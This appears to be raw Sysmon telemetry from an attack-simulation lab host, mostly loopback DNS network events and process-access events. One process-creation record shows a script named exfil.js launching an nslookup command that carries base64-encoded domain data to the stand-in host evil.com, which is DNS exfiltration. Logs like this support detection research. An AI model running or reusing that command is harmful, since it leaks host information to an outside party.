14:21:36.197{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-4E44-000000005F02}7212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.181{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-4D44-000000005F02}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.181{2E1864BB-18E0-629A-6742-000000005F02}39767744C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-4D44-000000005F02}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.192{2E1864BB-18F0-629A-4D44-000000005F02}3448C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliswqh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.181{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmlr.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000210625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.722{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-50827-false127.0.0.1-53domain 354300x8000000000000000210624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.721{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50827- 354300x8000000000000000210623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.721{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-50827-false127.0.0.1-53domain 354300x8000000000000000210622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.721{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-50826-false127.0.0.1-53domain 354300x8000000000000000210621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.719{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50826- 354300x8000000000000000210620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.719{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-50826-false127.0.0.1-53domain 354300x8000000000000000210619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.718{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-50825-false127.0.0.1-53domain 354300x8000000000000000210618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.718{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50825- 354300x8000000000000000210617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.718{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-50825-false127.0.0.1-53domain 354300x8000000000000000210616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.639{00000000-0000-0000-0000-000000000000}5928<unknown process>-udpfalsefalse127.0.0.1-50824-false127.0.0.1-53domain 354300x8000000000000000210615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.639{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50824- 354300x8000000000000000210614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.639{00000000-0000-0000-0000-000000000000}5928<unknown process>-udptruefalse127.0.0.1-50824-false127.0.0.1-53domain 354300x8000000000000000210613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.639{00000000-0000-0000-0000-000000000000}5928<unknown process>-udpfalsefalse127.0.0.1-50823-false127.0.0.1-53domain 354300x8000000000000000210612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.639{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50823- 354300x8000000000000000210611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.638{00000000-0000-0000-0000-000000000000}5928<unknown process>-udptruefalse127.0.0.1-50823-false127.0.0.1-53domain 354300x8000000000000000210610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.638{00000000-0000-0000-0000-000000000000}5928<unknown process>-udpfalsefalse127.0.0.1-50822-false127.0.0.1-53domain 354300x8000000000000000210609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.638{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50822- 354300x8000000000000000210608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.638{00000000-0000-0000-0000-000000000000}5928<unknown process>-udptruefalse127.0.0.1-50822-false127.0.0.1-53domain 354300x8000000000000000210607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.558{00000000-0000-0000-0000-000000000000}5960<unknown process>-udpfalsefalse127.0.0.1-50821-false127.0.0.1-53domain 354300x8000000000000000210606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.557{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50821- 354300x8000000000000000210605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.557{00000000-0000-0000-0000-000000000000}5960<unknown process>-udptruefalse127.0.0.1-50821-false127.0.0.1-53domain 354300x8000000000000000210604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.491{00000000-0000-0000-0000-000000000000}7616<unknown process>-udpfalsefalse127.0.0.1-50820-false127.0.0.1-53domain 354300x8000000000000000210603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.491{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50820- 354300x8000000000000000210602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.491{00000000-0000-0000-0000-000000000000}7616<unknown process>-udptruefalse127.0.0.1-50820-false127.0.0.1-53domain 354300x8000000000000000210601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.491{00000000-0000-0000-0000-000000000000}7616<unknown process>-udpfalsefalse127.0.0.1-50819-false127.0.0.1-53domain 354300x8000000000000000210600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.491{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50819- 354300x8000000000000000210599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.491{00000000-0000-0000-0000-000000000000}7616<unknown process>-udptruefalse127.0.0.1-50819-false127.0.0.1-53domain 354300x8000000000000000210598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.490{00000000-0000-0000-0000-000000000000}7616<unknown process>-udpfalsefalse127.0.0.1-50818-false127.0.0.1-53domain 354300x8000000000000000210597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.490{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50818- 354300x8000000000000000210596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.490{00000000-0000-0000-0000-000000000000}7616<unknown process>-udptruefalse127.0.0.1-50818-false127.0.0.1-53domain 354300x8000000000000000210595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.412{00000000-0000-0000-0000-000000000000}5516<unknown process>-udpfalsefalse127.0.0.1-50817-false127.0.0.1-53domain 354300x8000000000000000210594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.411{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50817- 354300x8000000000000000210593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.411{00000000-0000-0000-0000-000000000000}5516<unknown process>-udptruefalse127.0.0.1-50817-false127.0.0.1-53domain 354300x8000000000000000210592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.411{00000000-0000-0000-0000-000000000000}5516<unknown process>-udpfalsefalse127.0.0.1-50816-false127.0.0.1-53domain 354300x8000000000000000210591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.411{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50816- 354300x8000000000000000210590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.411{00000000-0000-0000-0000-000000000000}5516<unknown process>-udptruefalse127.0.0.1-50816-false127.0.0.1-53domain 354300x8000000000000000210589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.411{00000000-0000-0000-0000-000000000000}5516<unknown process>-udpfalsefalse127.0.0.1-50815-false127.0.0.1-53domain 354300x8000000000000000210588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.411{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50815- 354300x8000000000000000210587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.411{00000000-0000-0000-0000-000000000000}5516<unknown process>-udptruefalse127.0.0.1-50815-false127.0.0.1-53domain 354300x8000000000000000210586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.329{00000000-0000-0000-0000-000000000000}2316<unknown process>-udpfalsefalse127.0.0.1-50814-false127.0.0.1-53domain 354300x8000000000000000210585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.329{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50814- 354300x8000000000000000210584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.329{00000000-0000-0000-0000-000000000000}2316<unknown process>-udptruefalse127.0.0.1-50814-false127.0.0.1-53domain 354300x8000000000000000210583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.328{00000000-0000-0000-0000-000000000000}2316<unknown process>-udpfalsefalse127.0.0.1-50813-false127.0.0.1-53domain 354300x8000000000000000210582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.328{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50813- 354300x8000000000000000210581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.328{00000000-0000-0000-0000-000000000000}2316<unknown process>-udptruefalse127.0.0.1-50813-false127.0.0.1-53domain 354300x8000000000000000210580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.327{00000000-0000-0000-0000-000000000000}2316<unknown process>-udpfalsefalse127.0.0.1-50812-false127.0.0.1-53domain 354300x8000000000000000210579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.327{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50812- 354300x8000000000000000210578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.327{00000000-0000-0000-0000-000000000000}2316<unknown process>-udptruefalse127.0.0.1-50812-false127.0.0.1-53domain 354300x8000000000000000210577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.246{00000000-0000-0000-0000-000000000000}6560<unknown process>-udpfalsefalse127.0.0.1-50811-false127.0.0.1-53domain 354300x8000000000000000210576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.246{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50811- 354300x8000000000000000210575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.246{00000000-0000-0000-0000-000000000000}6560<unknown process>-udptruefalse127.0.0.1-50811-false127.0.0.1-53domain 354300x8000000000000000210574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.246{00000000-0000-0000-0000-000000000000}6560<unknown process>-udpfalsefalse127.0.0.1-50810-false127.0.0.1-53domain 354300x8000000000000000210573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.246{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50810- 354300x8000000000000000210572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.246{00000000-0000-0000-0000-000000000000}6560<unknown process>-udptruefalse127.0.0.1-50810-false127.0.0.1-53domain 354300x8000000000000000210571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.245{00000000-0000-0000-0000-000000000000}6560<unknown process>-udpfalsefalse127.0.0.1-50809-false127.0.0.1-53domain 354300x8000000000000000210570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.245{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50809- 354300x8000000000000000210569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.245{00000000-0000-0000-0000-000000000000}6560<unknown process>-udptruefalse127.0.0.1-50809-false127.0.0.1-53domain 354300x8000000000000000210568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.148{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50808- 354300x8000000000000000210567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.148{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50807- 354300x8000000000000000210566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.148{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50806- 354300x8000000000000000210565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.147{00000000-0000-0000-0000-000000000000}4780<unknown process>-udptruefalse127.0.0.1-50806-false127.0.0.1-53domain 354300x8000000000000000210564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.047{00000000-0000-0000-0000-000000000000}4616<unknown process>-udpfalsefalse127.0.0.1-50805-false127.0.0.1-53domain 354300x8000000000000000210563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.047{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50805- 354300x8000000000000000210562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.047{00000000-0000-0000-0000-000000000000}4616<unknown process>-udptruefalse127.0.0.1-50805-false127.0.0.1-53domain 354300x8000000000000000210561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.047{00000000-0000-0000-0000-000000000000}4616<unknown process>-udpfalsefalse127.0.0.1-50804-false127.0.0.1-53domain 354300x8000000000000000210560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.047{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50804- 354300x8000000000000000210559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.047{00000000-0000-0000-0000-000000000000}4616<unknown process>-udptruefalse127.0.0.1-50804-false127.0.0.1-53domain 354300x8000000000000000210558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.047{00000000-0000-0000-0000-000000000000}4616<unknown process>-udpfalsefalse127.0.0.1-50803-false127.0.0.1-53domain 354300x8000000000000000210557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.047{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50803- 354300x8000000000000000210556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.047{00000000-0000-0000-0000-000000000000}4616<unknown process>-udptruefalse127.0.0.1-50803-false127.0.0.1-53domain 354300x8000000000000000210555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.976{00000000-0000-0000-0000-000000000000}3360<unknown process>-udpfalsefalse127.0.0.1-50802-false127.0.0.1-53domain 354300x8000000000000000210554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.976{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50802- 354300x8000000000000000210553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.976{00000000-0000-0000-0000-000000000000}3360<unknown process>-udpfalsefalse127.0.0.1-50801-false127.0.0.1-53domain 354300x8000000000000000210552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.976{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50801- 354300x8000000000000000210551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.976{00000000-0000-0000-0000-000000000000}3360<unknown process>-udptruefalse127.0.0.1-50801-false127.0.0.1-53domain 354300x8000000000000000210550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.975{00000000-0000-0000-0000-000000000000}3360<unknown process>-udpfalsefalse127.0.0.1-50800-false127.0.0.1-53domain 354300x8000000000000000210549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.975{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50800- 354300x8000000000000000210548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.975{00000000-0000-0000-0000-000000000000}3360<unknown process>-udptruefalse127.0.0.1-50800-false127.0.0.1-53domain 354300x8000000000000000210547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.915{00000000-0000-0000-0000-000000000000}2900<unknown process>-udpfalsefalse127.0.0.1-50799-false127.0.0.1-53domain 354300x8000000000000000210546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.915{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50799- 354300x8000000000000000210545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.914{00000000-0000-0000-0000-000000000000}2900<unknown process>-udpfalsefalse127.0.0.1-50798-false127.0.0.1-53domain 354300x8000000000000000210544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.914{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50798- 354300x8000000000000000210543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.914{00000000-0000-0000-0000-000000000000}2900<unknown process>-udpfalsefalse127.0.0.1-50797-false127.0.0.1-53domain 354300x8000000000000000210542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.914{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50797- 354300x8000000000000000210541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.914{00000000-0000-0000-0000-000000000000}2900<unknown process>-udptruefalse127.0.0.1-50797-false127.0.0.1-53domain 354300x8000000000000000210540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.853{00000000-0000-0000-0000-000000000000}6932<unknown process>-udpfalsefalse127.0.0.1-50796-false127.0.0.1-53domain 354300x8000000000000000210539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.853{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50796- 354300x8000000000000000210538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.853{00000000-0000-0000-0000-000000000000}6932<unknown process>-udptruefalse127.0.0.1-50796-false127.0.0.1-53domain 354300x8000000000000000210537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.852{00000000-0000-0000-0000-000000000000}6932<unknown process>-udpfalsefalse127.0.0.1-50795-false127.0.0.1-53domain 354300x8000000000000000210536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.852{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50795- 354300x8000000000000000210535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.852{00000000-0000-0000-0000-000000000000}6932<unknown process>-udptruefalse127.0.0.1-50795-false127.0.0.1-53domain 354300x8000000000000000210534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.852{00000000-0000-0000-0000-000000000000}6932<unknown process>-udpfalsefalse127.0.0.1-50794-false127.0.0.1-53domain 354300x8000000000000000210533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.852{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50794- 354300x8000000000000000210532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.852{00000000-0000-0000-0000-000000000000}6932<unknown process>-udptruefalse127.0.0.1-50794-false127.0.0.1-53domain 